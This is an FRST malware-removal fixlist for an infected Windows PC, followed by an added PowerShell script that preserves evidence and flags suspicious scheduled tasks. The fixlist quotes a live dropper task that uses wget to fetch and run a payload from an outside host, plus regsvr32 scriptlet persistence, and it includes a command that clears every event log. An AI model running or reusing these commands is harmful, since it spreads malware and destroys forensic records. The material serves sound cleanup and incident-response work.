CloseProcesses:
CreateRestorePoint:
GroupPolicy: Restriction <==== ATTENTION
GroupPolicyUsers\S-1-5-21-3338460377-1035617240-3592817547-1001\User: Restriction <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings: [ProxySettingsPerUser] 0 <==== ATTENTION (Restriction - ProxySettings)
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com
FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - D:\ESET\ESET Smart Security\Mozilla Thunderbird => not found
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - D:\Internet Download Manager\IDMGCExt.crx
2018-01-26 18:13 - 2018-01-26 18:18 - 000000000 ____D C:\AdwCleaner
CustomCLSID: HKU\S-1-5-21-3338460377-1035617240-3592817547-1001_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 -> C:\Users\Kuba\AppData\Local\Microsoft\OneDrive\17.3.7131.1115\amd64\FileSyncShell64.dll => No File
CustomCLSID: HKU\S-1-5-21-3338460377-1035617240-3592817547-1001_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32 -> C:\Users\Kuba\AppData\Local\Microsoft\OneDrive\17.3.7131.1115\amd64\FileSyncShell64.dll => No File
CustomCLSID: HKU\S-1-5-21-3338460377-1035617240-3592817547-1001_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32 -> C:\Users\Kuba\AppData\Local\Microsoft\OneDrive\17.3.7131.1115\amd64\FileSyncShell64.dll => No File
ContextMenuHandlers1: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => -> No File
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => -> No File
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => -> No File
ContextMenuHandlers3: [{4A7C4306-57E0-4C0C-83A9-78C1528F618C}] -> {4A7C4306-57E0-4C0C-83A9-78C1528F618C} => -> No File
ContextMenuHandlers4: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => -> No File
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => -> No File
Task: {0F32CD89-7349-4DF1-907E-8BDDF0FDA4FF} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {12019626-691F-462A-877A-54009CA8FFE1} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {1D4F8634-EDE2-423E-B7B8-90EA16A8CA3E} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://grigle.in/index.php?data=KEy9HdgPlS;Nero_BurningROM2014-15.0.03900_trial.exe;1423482306 & start cmd /R dat.bmp <==== ATTENTION
Task: {1DA05B72-C9FF-464B-86D9-3F8A33B4120C} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {1FCB9178-9830-49C3-89F5-DC342024EE28} - System32\Tasks\{55F8496A-A085-4AAB-9E43-B090C3019AA4} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Common Files\TreeSondex\uninstall.exe" -c shuz -f "C:\Program Files (x86)\Common Files\TreeSondex\uninstall.dat" -a uninstallme 7522E4EA-1ACE-45A4-BBF9-129B9513C307 DeviceId=05f8e6e5-c3c4-050f-79c2-e538d8beee67 BarcodeId=51198003 ChannelId=3 DistributerName=APSFWakeNet
Task: {2FA7DFB0-7C90-4D3B-B3E3-3B1BE2C29218} - System32\Tasks\{0B6B7ED4-F9B0-4FEE-B80F-4F5FBF45EE58} => C:\WINDOWS\system32\pcalua.exe -a "D:\Electronic Arts\Harry Potter i Książę Półkrwi™\Support\Harry Potter and the Half-Blood Prince_uninst.exe" -d "D:\Electronic Arts\Harry Potter i Książę Półkrwi™\Support"
Task: {620A87CB-88AA-4B0D-9992-9FABA4DE2CDC} - System32\Tasks\FileFly => c:\programdata\{a9c98202-6e05-2ce5-a9c9-982026e00809}\461613016231735287b.exe <==== ATTENTION
Task: {74DC3443-7AA0-4E36-9599-B74A9C5969A0} - System32\Tasks\{D19480A7-1C66-4718-A8E7-F7E7E50BF497} => C:\WINDOWS\system32\pcalua.exe -a "D:\FIFA 14\FIFA 14\ModdingWayInstaller.exe" -d "D:\FIFA 14\FIFA 14"
Task: {770B9597-E2AE-4BB0-895C-A38B09C55C11} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {7C66FF70-56BD-41B3-B26E-AE0C5C9A54A1} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {7DEA7A48-3471-400A-A2B0-5BA365DEA500} - System32\Tasks\{34B4CAAD-11F8-4171-A5C6-F0D058BBECC9} => "c:\program files (x86)\mozilla firefox\firefox.exe" hxxp://ui.skype.com/ui/0/7.16.0.101/pl/abandoninstall?source=lightinstaller&page=tsPlugin
Task: {7E8FE418-B5EF-446D-9293-4B095C5FB793} - System32\Tasks\{F7606602-E4E6-4ABA-B255-0B35486D49BB} => C:\WINDOWS\system32\pcalua.exe -a "D:\Electronic Arts\Harry Potter i Książę Półkrwi™\Support\Harry Potter and the Half-Blood Prince_code.exe" -d "D:\Electronic Arts\Harry Potter i Książę Półkrwi™\Support"
Task: {8B46E8C1-AEFC-49D1-8522-02E4C45F912D} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {9248F670-676C-4190-AB1A-44DD598710D2} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {9B4F6793-CF3F-4D89-8741-97367C230EE1} - System32\Tasks\{29B5CD46-A6CA-4EA3-98F0-78DF954E236F} => C:\WINDOWS\system32\pcalua.exe -a D:\KMSpico\unins000.exe
Task: {9E88CD04-A2E3-41EA-A63F-5E8F99686800} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {A2B06537-F7F0-4A38-BE1C-C04DB75FE0A0} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {A3169C11-BCCA-4CB5-A08C-A51FDDC0DF4E} - System32\Tasks\4B55B688-1080-8A52-689E-71FB723AAFC3 => C:\WINDOWS\SysWOW64\regsvr32.exe /n /s /i:"/4ba6e1555c879c97 /q" "C:\Users\Kuba\AppData\Local\348936~1\{8BE76~1."
Task: {C3B9D0C9-5271-42B1-A4CD-E31139294E43} - System32\Tasks\{19B825F8-9F85-4BF6-827A-627D610B159C} => "c:\program files (x86)\mozilla firefox\firefox.exe" hxxp://ui.skype.com/ui/0/7.16.0.101/pl/abandoninstall?source=lightinstaller&page=tsBing
Task: {CFBF0E7F-1CBF-4855-82B0-6EDB908AF560} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {D04221DC-B8CA-448C-A4E2-AF42C3CCE8C2} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {D4686AC8-5458-4B85-940E-907BCC7A1D35} - System32\Tasks\{0FAFF3B4-ED64-4F84-81E8-F6FEF9CD8CCE} => "c:\program files (x86)\mozilla firefox\firefox.exe" hxxp://ui.skype.com/ui/0/7.16.0.101/pl/abandoninstall?source=lightinstaller&page=tsInstall
Task: {DDC5D6E7-EDD2-4715-8145-3B60B1AEB42B} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: C:\WINDOWS\Tasks\FileFly.job => c:\programdata\{a9c98202-6e05-2ce5-a9c9-982026e00809}\461613016231735287b.exe <==== ATTENTION
AlternateDataStreams: C:\ProgramData\TEMP:B755D674 [352]
AlternateDataStreams: C:\ProgramData\TEMP:D78D6FF7 [154]
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Minecraft\Minecraft .lnk -> C:\Users\Kuba\AppData\Roaming\.minecraft\Minecraft.exe (No File)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Minecraft\Uninstall Minecraft .lnk -> C:\Users\Kuba\AppData\Roaming\.minecraft\unins000.exe (No File)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Android Studio\Android Studio.lnk -> D:\Android\Android Studio\bin\studio64.exe (No File)
Shortcut: C:\ProgramData\Microsoft\Windows\GameExplorer\{CDBE959D-BBEA-4785-8F62-BACA506B6FFB}\PlayTasks\4\Program konfiguracyjny.lnk -> D:\Assassin's Creed\Detection\Detection.exe (No File)
Shortcut: C:\ProgramData\Microsoft\Windows\GameExplorer\{CDBE959D-BBEA-4785-8F62-BACA506B6FFB}\PlayTasks\3\Instrukcja do gry.lnk -> D:\Assassin's Creed\Support\Manual\AssassinsCreed.pdf (No File)
Shortcut: C:\ProgramData\Microsoft\Windows\GameExplorer\{CDBE959D-BBEA-4785-8F62-BACA506B6FFB}\PlayTasks\2\CzytajTo.txt.lnk -> D:\Assassin's Creed\Support\ReadMe\CzytajTo.txt (No File)
Shortcut: C:\ProgramData\Microsoft\Windows\GameExplorer\{CDBE959D-BBEA-4785-8F62-BACA506B6FFB}\PlayTasks\1\Rejestruj.lnk -> D:\Assassin's Creed\Register\RegistrationReminder.exe (No File)
Shortcut: C:\ProgramData\Microsoft\Windows\GameExplorer\{CDBE959D-BBEA-4785-8F62-BACA506B6FFB}\PlayTasks\0\Graj.lnk -> D:\Assassin's Creed\AssassinsCreed_Launcher.exe (No File)
C:\Users\Kuba\Desktop\Euro Truck Simulator 2.lnk
C:\Users\Kuba\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.Studios.PinballFx2_8wekyb3d8bbwe\Pinball.App.lnk
EmptyTemp:
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
Hosts:
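Before FRST runs this fixlist, a responder will usually want to confirm the persistence it targets on the live host and to preserve evidence, because the `Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}` line clears every event log on the machine. The script below is an added example, not part of the original fixlist and not FRST's own logic. It exports the event logs, hashes the dropper the FileFly task points to, flags scheduled-task actions that match the patterns visible in the task entries above (a `ping`-as-sleep followed by `wget` and `start cmd /R`, `regsvr32 /i:` against an 8.3 short path, `pcalua.exe -a` as a proxy launcher, an executable in a GUID-named folder under C:\ProgramData), and lists alternate data streams under C:\ProgramData. The evidence directory `C:\IR\evidence` is an assumption; run it from an elevated PowerShell session.

```powershell
# Added example: pre-fix triage and evidence preservation for the persistence
# removed by the FRST fixlist above. Run elevated. $EvidenceDir is an assumed path.
$EvidenceDir = 'C:\IR\evidence'
New-Item -ItemType Directory -Path $EvidenceDir -Force | Out-Null

# 1. Export every event log first: the fixlist's "wevtutil cl" wipes them all.
wevtutil el | ForEach-Object {
    $safeName = $_ -replace '[\\/]', '-'          # log names may contain slashes
    wevtutil epl "$_" (Join-Path $EvidenceDir "$safeName.evtx")
}

# 2. Hash the dropper referenced by the FileFly task and FileFly.job, if still present.
$Dropper = 'C:\ProgramData\{a9c98202-6e05-2ce5-a9c9-982026e00809}\461613016231735287b.exe'
if (Test-Path -LiteralPath $Dropper) {
    Get-FileHash -Algorithm SHA256 -LiteralPath $Dropper |
        Export-Csv -Path (Join-Path $EvidenceDir 'dropper-hash.csv') -NoTypeInformation
}

# 3. Patterns taken from the task entries in the fixlist (case-insensitive -match).
$Suspicious = @(
    'ping\s+\S+\s+-n\s+\d+'              # ping used as a sleep before the download
    '\bwget\b|\bcurl\b|\bbitsadmin\b'    # downloader invoked from a task action
    'start\s+cmd\s+/R'                   # execute the file that was just fetched
    'regsvr32(\.exe)?\s+.*/i:'           # regsvr32 /i: with attacker-chosen argument
    'pcalua(\.exe)?\s+-a'                # Program Compatibility Assistant as launcher
    '\\programdata\\\{[0-9a-f-]{36}\}\\' # executable in a GUID-named ProgramData folder
)

$Findings = foreach ($task in Get-ScheduledTask) {
    foreach ($action in $task.Actions) {
        $cmd  = "$($action.Execute) $($action.Arguments)"
        $hits = @($Suspicious | Where-Object { $cmd -match $_ })
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                Task    = $task.TaskPath + $task.TaskName
                State   = $task.State
                Command = $cmd
                Matched = $hits -join ' | '
            }
        }
    }
}
$Findings | Format-List
$Findings | Export-Csv -Path (Join-Path $EvidenceDir 'suspicious-tasks.csv') -NoTypeInformation

# Legacy .job files (the fixlist also removes C:\WINDOWS\Tasks\FileFly.job).
Get-ChildItem -Path 'C:\Windows\Tasks' -Filter '*.job' -Force -ErrorAction SilentlyContinue |
    Select-Object FullName, LastWriteTime, Length

# 4. Alternate data streams directly under C:\ProgramData (the fixlist removes two on
#    C:\ProgramData\TEMP). ':$DATA' is the normal unnamed stream and is filtered out.
Get-Item -Path 'C:\ProgramData\*' -Force -Stream * -ErrorAction SilentlyContinue |
    Where-Object { $_.Stream -ne ':$DATA' } |
    Select-Object FileName, Stream, Length |
    Tee-Object -FilePath (Join-Path $EvidenceDir 'programdata-ads.txt')
```

The task check deliberately matches on the joined `Execute` plus `Arguments` string rather than on the executable name alone, because in the entries above the interesting part is the argument (the `wget ... & start cmd /R dat.bmp` chain, the `/i:` scriptlet argument to regsvr32), not the host binary. Keep the exported `.evtx` files and the CSVs off the host before running the fixlist.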